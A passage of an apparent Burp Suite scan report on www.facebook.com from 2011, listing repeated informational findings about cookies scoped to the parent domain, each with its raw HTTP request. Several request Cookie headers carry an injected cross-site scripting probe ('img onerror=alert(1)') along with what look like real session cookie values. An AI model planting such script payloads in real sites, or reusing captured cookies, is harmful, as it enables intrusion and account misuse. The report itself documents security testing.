Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/mobile/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.4.111
Connection: close
Date: Thu, 05 May 2011 10:56:38 GMT
Content-Length: 0

10.56. http://www.facebook.com/mobile/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/mobile/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mobile/?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffind-friends%3Fref%3Dpf; act=1304613659940%2F1; _e_nXwy_0=%5B%22nXwy%22%2C1304613659942%2C%22act%22%2C1304613659940%2C1%2C%22http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf%23%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fmobile%2F%3Fref%3Dpf%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C469%2C478%2C0%2C1006%2C16%5D; wd=1022x1007

Response

10.57. http://www.facebook.com/mobile/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/mobile/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_e_nXwy_1=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
next=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fsettings; path=/; domain=.facebook.com; httponly
next_path=%2Fmobile%2F%3Fsettings; path=/; domain=.facebook.com; httponly
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mobile/?settings HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/mobile/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf; wd=1022x1007; act=1304613664644%2F2; _e_nXwy_1=%5B%22nXwy%22%2C1304613664645%2C%22act%22%2C1304613664644%2C2%2C%22http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fsettings%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fmobile%2F%3Fref%3Dpf%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C181%2C760%2C0%2C1006%2C16%5D

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/login.php
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: _e_nXwy_1=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fsettings; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=%2Fmobile%2F%3Fsettings; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.145.51
X-Cnection: close
Date: Thu, 05 May 2011 11:43:56 GMT
Content-Length: 0

10.58. http://www.facebook.com/pages/Barnesville/115038011847083 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/Barnesville/115038011847083

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Barnesville/115038011847083 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.59. http://www.facebook.com/pages/Beacon-of-Hope-Resource-Center/34194116820 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/Beacon-of-Hope-Resource-Center/34194116820

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Beacon-of-Hope-Resource-Center/34194116820 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.60. http://www.facebook.com/pages/Bernicks-Pepsi/123296084349478 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/Bernicks-Pepsi/123296084349478

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Bernicks-Pepsi/123296084349478 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.61. http://www.facebook.com/pages/Blaine-Senior-High/106189406087059 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/Blaine-Senior-High/106189406087059

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Blaine-Senior-High/106189406087059 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.62. http://www.facebook.com/pages/Editor-in-Chief/137829579583400 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/Editor-in-Chief/137829579583400

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Editor-in-Chief/137829579583400 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.63. http://www.facebook.com/pages/Gilco-Corporation/109823499042436 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/Gilco-Corporation/109823499042436

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Gilco-Corporation/109823499042436 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.64. http://www.facebook.com/pages/HMFIC/149403761740008 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/HMFIC/149403761740008

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/HMFIC/149403761740008 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.65. http://www.facebook.com/pages/HuffPost-World/70242384902 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/HuffPost-World/70242384902

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/HuffPost-World/70242384902 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 301 Moved Permanently
Location: http://www.facebook.com/HuffPostWorld
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.199.43
Connection: close
Date: Thu, 05 May 2011 11:42:02 GMT
Content-Length: 0

10.66. http://www.facebook.com/pages/Manchester-Connecticut/112527912096312 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/Manchester-Connecticut/112527912096312

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Manchester-Connecticut/112527912096312 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.67. http://www.facebook.com/pages/Merchandiser/123981654314779 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/Merchandiser/123981654314779

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Merchandiser/123981654314779 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.68. http://www.facebook.com/pages/New-Haven-College/130105783687523 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/New-Haven-College/130105783687523

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/New-Haven-College/130105783687523 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.69. http://www.facebook.com/pages/Northern-Illinois-University/108155335871674 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/Northern-Illinois-University/108155335871674

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Northern-Illinois-University/108155335871674 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.70. http://www.facebook.com/pages/San-Antonio-Texas/110297742331680 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/San-Antonio-Texas/110297742331680

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/San-Antonio-Texas/110297742331680 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.71. http://www.facebook.com/pages/School-of-Hard-Knocks-University-of-Life/115228431825707 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/School-of-Hard-Knocks-University-of-Life/115228431825707

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/School-of-Hard-Knocks-University-of-Life/115228431825707 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.72. http://www.facebook.com/pages/Sporting-News/104068362964496 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/Sporting-News/104068362964496

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Sporting-News/104068362964496 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.73. http://www.facebook.com/pages/ToP-SeCNeT/195242630519520 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/ToP-SeCNeT/195242630519520

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/ToP-SeCNeT/195242630519520 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.74. http://www.facebook.com/pages/University-of-Chicago-Semester-in-Madrid/144554762263161 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/University-of-Chicago-Semester-in-Madrid/144554762263161

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

